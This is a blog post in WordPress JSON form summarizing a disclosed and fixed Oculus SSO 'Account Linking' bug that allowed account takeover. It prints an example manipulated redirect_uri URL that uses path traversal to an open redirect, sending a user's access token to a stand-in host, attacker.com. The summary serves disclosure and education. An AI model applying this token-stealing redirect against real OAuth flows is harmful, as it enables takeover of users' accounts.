{"id":4624,"date":"2024-06-21T07:08:36","date_gmt":"2024-06-21T07:08:36","guid":{"rendered":"https:\/\/secry.me\/explore\/?p=4624"},"modified":"2024-06-30T14:30:37","modified_gmt":"2024-06-30T14:30:37","slug":"facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover","status":"publish","type":"post","link":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/","title":{"rendered":"Facebook Oculus SSO Bug: How a Simple Manipulation Led to Account Takeover"},"content":{"rendered":"<div class=\"c7f5092f831f91fb6af859cc3a8052cc\" data-index=\"4\" style=\"float: none; margin:10px 0 10px 0; text-align:center;\">\n<script async src=\"https:\/\/securepubads.g.doubleclick.net\/tag\/js\/gpt.js\"><\/script>\r\n<script>\r\n  window.googletag = window.googletag || {cmd: []};\r\n  googletag.cmd.push(function() {\r\n    googletag.defineSlot('\/22608490431\/iklan1', [[320, 100], [300, 50]], 'div-gpt-ad-1696178236578-0').addService(googletag.pubads());\r\n    googletag.pubads().enableSingleRequest();\r\n    googletag.enableServices();\r\n  });\r\n<\/script>\r\n<!-- \/22608490431\/iklan1 -->\r\n<div id='div-gpt-ad-1696178236578-0' style='min-width: 300px; min-height: 50px;'>\r\n  <script>\r\n    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1696178236578-0'); });\r\n  <\/script>\r\n<\/div>\n<\/div>\n<h3>Oculus Account Takeover: Oculus SSO &#8220;Account Linking&#8221; Bug Exposes Users to Account Takeover<\/h3>\n<p><strong>Oculus Account Takeover<\/strong> &#8211; A critical security vulnerability in Oculus&#8217;s &#8220;Account Linking&#8221; feature, discovered by bug hunter <a href=\"https:\/\/www.google.com\/search?q=Youssef\">Youssef<\/a> Sammouda, has put users at risk of account takeover on third-party websites and VR games\/apps. The bug, reported on February 26, 2021, was acknowledged by Facebook on March 2, 2021, and fixed on March 16, 2021.<\/p>\n<p>The <a href=\"https:\/\/secry.me\/explore\/category\/news\/\">vulnerability<\/a> allowed attackers to manipulate the callback endpoint, redirecting the Oculus access token to their own website, potentially leading to account takeover. This was possible due to a lack of exact matching of values in the <em><strong>redirect_uri<\/strong><\/em> parameter and the organization&#8217;s SSO settings, as well as inadequate filtering of characters.<\/p>\n<p>To exploit this bug, an attacker could modify the redirect_uri parameter, for example, from:<\/p>\n<p><em>https:\/\/auth.oculus.com\/sso\/?redirect_uri=https:\/\/forums.oculusvr.com\/hucou38897\/plugins\/custom\/facebook\/fboculus\/custom.oauthsso-redirect&amp;organization_id=695304644729285<\/em><\/p>\n<p>to:<\/p>\n<p><em>https:\/\/auth.oculus.com\/sso\/?redirect_uri=https:\/\/forums.oculusvr.com\/hucou38897\/plugins\/custom\/facebook\/fboculus\/custom.oauthsso-redirect\/..\/..\/..\/..\/..\/..\/open_redirect?next=https:\/\/www.attacker.com&amp;organization_id=695304644729285<\/em><\/p>\n<p>The access token would then be sent to the attacker&#8217;s website, allowing them to login to the user&#8217;s Oculus account and potentially access other linked accounts in VR games and apps.<\/p>\n<p>Sammouda notes that this type of bug is common in OAuth authentication flows and emphasizes the importance of checking for small and common issues before looking for complex ones. Facebook has since fixed the issue and awarded Sammouda a <strong>$12000<\/strong> bounty, including a bonus, for his discovery.<\/p>\n<p>This incident highlights the importance of thorough security testing and responsible disclosure in ensuring the safety and security of users&#8217; accounts. By working together with security researchers like Sammouda, companies can identify and address vulnerabilities before they can be exploited by malicious actors.<\/p>\n<p>&nbsp;<\/p>\n<div class=\"x1e56ztr\"><strong><span class=\"x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs xt0psk2 xt4736n x1havqas x1f0sm9e x12qp5cl xzsf02u x1yc453h\">&#8211;Meta bug bounty program<\/span><\/strong><\/div>\n<p>&nbsp;<\/p>\n<p><strong>Link to read full write up: <\/strong>https:\/\/ysamm.com\/?p=697<\/p>\n<p><strong>Save the PDF<\/strong>\u00a0<a href=\"https:\/\/secry.me\/explore\/pdf-story\/TAKE%20OVER\/Oculus%20SSO%20%E2%80%9CAccount%20Linking%E2%80%9D%20bug%20leads%20to%20account%20takeover%20on%20third%20party%20websites%20and%20inside%20VR%20Games_Apps%20%E2%80%93%20Youssef%20Sammouda.pdf\"><em>here<\/em><\/a><\/p>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\"><\/div>\n\n<div style=\"font-size: 0px; height: 0px; line-height: 0px; margin: 0; padding: 0; clear: both;\"><\/div>","protected":false},"excerpt":{"rendered":"<p>Oculus Account Takeover: Oculus SSO &#8220;Account Linking&#8221; Bug Exposes Users to Account Takeover Oculus Account Takeover &#8211; A critical security vulnerability in Oculus&#8217;s &#8220;Account Linking&#8221; feature, discovered by bug hunter Youssef Sammouda, has put users at risk of account takeover on third-party websites and VR games\/apps. The bug, reported on February 26, 2021, was acknowledged [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":4633,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[107,136,461,106],"tags":[13,117,451,447,450,448],"class_list":["post-4624","post","type-post","status-publish","format-standard","has-post-thumbnail","category-account-takeover","category-bug-bounty","category-meta-bug-bounty","category-takeover","tag-bug-bounty","tag-facebook","tag-facebook-bug-bounty","tag-meta-bug-bounty","tag-meta-bug-bounty-program","tag-meta-bug-bounty-write-up"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v21.4 (Yoast SEO v27.7) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Facebook Oculus SSO Bug: How a Simple Manipulation Led to Account Takeover | SECRY<\/title>\n<meta name=\"description\" content=\"Oculus Account Takeover: Oculus SSO &quot;Account Linking&quot; Bug Exposes Users to Account Takeover Oculus Account Takeover - A critical security vulnerability in\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Facebook Oculus SSO Bug: How a Simple Manipulation Led to Account Takeover | SECRY\" \/>\n<meta property=\"og:description\" content=\"Oculus Account Takeover: Oculus SSO &quot;Account Linking&quot; Bug Exposes Users to Account Takeover Oculus Account Takeover - A critical security vulnerability in\" \/>\n<meta property=\"og:url\" content=\"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/\" \/>\n<meta property=\"og:site_name\" content=\"SECRY\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/secry.me\" \/>\n<meta property=\"article:published_time\" content=\"2024-06-21T07:08:36+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-06-30T14:30:37+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/secry.me\/explore\/wp-content\/uploads\/2024\/06\/Oculus-SSO-Account-Linking-Account-Takeover.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1280\" \/>\n\t<meta property=\"og:image:height\" content=\"720\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Christin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Christin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"NewsArticle\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\\\/\"},\"author\":{\"name\":\"Christin\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/person\\\/dbec053e2c1eab18214cc9769e329da0\"},\"headline\":\"Facebook Oculus SSO Bug: How a Simple Manipulation Led to Account Takeover\",\"datePublished\":\"2024-06-21T07:08:36+00:00\",\"dateModified\":\"2024-06-30T14:30:37+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\\\/\"},\"wordCount\":331,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2024\\\/06\\\/Oculus-SSO-Account-Linking-Account-Takeover.png\",\"keywords\":[\"Bug Bounty\",\"Facebook\",\"Facebook Bug Bounty\",\"Meta Bug Bounty\",\"Meta Bug Bounty Program\",\"Meta Bug Bounty Write Up\"],\"articleSection\":[\"Account Takeover\",\"Bug Bounty\",\"Meta Bug Bounty\",\"Takeover\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/secry.me\\\/explore\\\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\\\/\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\\\/\",\"name\":\"Facebook Oculus SSO Bug: How a Simple Manipulation Led to Account Takeover | SECRY\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2024\\\/06\\\/Oculus-SSO-Account-Linking-Account-Takeover.png\",\"datePublished\":\"2024-06-21T07:08:36+00:00\",\"dateModified\":\"2024-06-30T14:30:37+00:00\",\"description\":\"Oculus Account Takeover: Oculus SSO \\\"Account Linking\\\" Bug Exposes Users to Account Takeover Oculus Account Takeover - A critical security vulnerability in\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/secry.me\\\/explore\\\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\\\/#primaryimage\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2024\\\/06\\\/Oculus-SSO-Account-Linking-Account-Takeover.png\",\"contentUrl\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2024\\\/06\\\/Oculus-SSO-Account-Linking-Account-Takeover.png\",\"width\":1280,\"height\":720,\"caption\":\"Meta Oculus Account Takeover via Account Linking Feature\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/secry.me\\\/explore\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Facebook Oculus SSO Bug: How a Simple Manipulation Led to Account Takeover\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#website\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/\",\"name\":\"SECRY\",\"description\":\"#1 Cyber [SEC]urity Sto[RY]  -  News &amp; Bug Bounty Story Collections\",\"publisher\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#organization\"},\"alternateName\":\"Security Story\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/secry.me\\\/explore\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#organization\",\"name\":\"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections\",\"alternateName\":\"SECRY\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/secryweb.sirv.com\\\/WP_secry.me\\\/2022\\\/06\\\/cropped-SECRY.webp\",\"contentUrl\":\"https:\\\/\\\/secryweb.sirv.com\\\/WP_secry.me\\\/2022\\\/06\\\/cropped-SECRY.webp\",\"width\":512,\"height\":512,\"caption\":\"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections\"},\"image\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/secry.me\",\"https:\\\/\\\/pinterest.com\\\/secry_me\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/person\\\/dbec053e2c1eab18214cc9769e329da0\",\"name\":\"Christin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g\",\"caption\":\"Christin\"},\"description\":\"A cybersecurity practitioner with more than 5 years of experience in the cybersecurity world. Has an interest in creating simple blog websites, learning about SEO and graphic design, writing, AI, and understanding the concepts of journalism. Intentionally created this website to make the world of cybersecurity more engaging by combining it with journalistic principles and presenting cybersecurity stories that are easy to understand, which can help anyone who wants to develop in the cybersecurity world.\",\"sameAs\":[\"https:\\\/\\\/secry.me\\\/explore\"],\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/author\\\/secry\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Facebook Oculus SSO Bug: How a Simple Manipulation Led to Account Takeover | SECRY","description":"Oculus Account Takeover: Oculus SSO \"Account Linking\" Bug Exposes Users to Account Takeover Oculus Account Takeover - A critical security vulnerability in","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/","og_locale":"en_US","og_type":"article","og_title":"Facebook Oculus SSO Bug: How a Simple Manipulation Led to Account Takeover | SECRY","og_description":"Oculus Account Takeover: Oculus SSO \"Account Linking\" Bug Exposes Users to Account Takeover Oculus Account Takeover - A critical security vulnerability in","og_url":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/","og_site_name":"SECRY","article_publisher":"https:\/\/www.facebook.com\/secry.me","article_published_time":"2024-06-21T07:08:36+00:00","article_modified_time":"2024-06-30T14:30:37+00:00","og_image":[{"width":1280,"height":720,"url":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2024\/06\/Oculus-SSO-Account-Linking-Account-Takeover.png","type":"image\/png"}],"author":"Christin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Christin","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"NewsArticle","@id":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/#article","isPartOf":{"@id":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/"},"author":{"name":"Christin","@id":"https:\/\/secry.me\/explore\/#\/schema\/person\/dbec053e2c1eab18214cc9769e329da0"},"headline":"Facebook Oculus SSO Bug: How a Simple Manipulation Led to Account Takeover","datePublished":"2024-06-21T07:08:36+00:00","dateModified":"2024-06-30T14:30:37+00:00","mainEntityOfPage":{"@id":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/"},"wordCount":331,"commentCount":0,"publisher":{"@id":"https:\/\/secry.me\/explore\/#organization"},"image":{"@id":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/#primaryimage"},"thumbnailUrl":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2024\/06\/Oculus-SSO-Account-Linking-Account-Takeover.png","keywords":["Bug Bounty","Facebook","Facebook Bug Bounty","Meta Bug Bounty","Meta Bug Bounty Program","Meta Bug Bounty Write Up"],"articleSection":["Account Takeover","Bug Bounty","Meta Bug Bounty","Takeover"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/","url":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/","name":"Facebook Oculus SSO Bug: How a Simple Manipulation Led to Account Takeover | SECRY","isPartOf":{"@id":"https:\/\/secry.me\/explore\/#website"},"primaryImageOfPage":{"@id":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/#primaryimage"},"image":{"@id":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/#primaryimage"},"thumbnailUrl":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2024\/06\/Oculus-SSO-Account-Linking-Account-Takeover.png","datePublished":"2024-06-21T07:08:36+00:00","dateModified":"2024-06-30T14:30:37+00:00","description":"Oculus Account Takeover: Oculus SSO \"Account Linking\" Bug Exposes Users to Account Takeover Oculus Account Takeover - A critical security vulnerability in","breadcrumb":{"@id":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/#primaryimage","url":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2024\/06\/Oculus-SSO-Account-Linking-Account-Takeover.png","contentUrl":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2024\/06\/Oculus-SSO-Account-Linking-Account-Takeover.png","width":1280,"height":720,"caption":"Meta Oculus Account Takeover via Account Linking Feature"},{"@type":"BreadcrumbList","@id":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/secry.me\/explore\/"},{"@type":"ListItem","position":2,"name":"Facebook Oculus SSO Bug: How a Simple Manipulation Led to Account Takeover"}]},{"@type":"WebSite","@id":"https:\/\/secry.me\/explore\/#website","url":"https:\/\/secry.me\/explore\/","name":"SECRY","description":"#1 Cyber [SEC]urity Sto[RY]  -  News &amp; Bug Bounty Story Collections","publisher":{"@id":"https:\/\/secry.me\/explore\/#organization"},"alternateName":"Security Story","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/secry.me\/explore\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/secry.me\/explore\/#organization","name":"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections","alternateName":"SECRY","url":"https:\/\/secry.me\/explore\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secry.me\/explore\/#\/schema\/logo\/image\/","url":"https:\/\/secryweb.sirv.com\/WP_secry.me\/2022\/06\/cropped-SECRY.webp","contentUrl":"https:\/\/secryweb.sirv.com\/WP_secry.me\/2022\/06\/cropped-SECRY.webp","width":512,"height":512,"caption":"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections"},"image":{"@id":"https:\/\/secry.me\/explore\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/secry.me","https:\/\/pinterest.com\/secry_me"]},{"@type":"Person","@id":"https:\/\/secry.me\/explore\/#\/schema\/person\/dbec053e2c1eab18214cc9769e329da0","name":"Christin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g","caption":"Christin"},"description":"A cybersecurity practitioner with more than 5 years of experience in the cybersecurity world. Has an interest in creating simple blog websites, learning about SEO and graphic design, writing, AI, and understanding the concepts of journalism. Intentionally created this website to make the world of cybersecurity more engaging by combining it with journalistic principles and presenting cybersecurity stories that are easy to understand, which can help anyone who wants to develop in the cybersecurity world.","sameAs":["https:\/\/secry.me\/explore"],"url":"https:\/\/secry.me\/explore\/author\/secry\/"}]}},"_links":{"self":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts\/4624","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/comments?post=4624"}],"version-history":[{"count":10,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts\/4624\/revisions"}],"predecessor-version":[{"id":4668,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts\/4624\/revisions\/4668"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/media\/4633"}],"wp:attachment":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/media?parent=4624"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/categories?post=4624"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/tags?post=4624"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}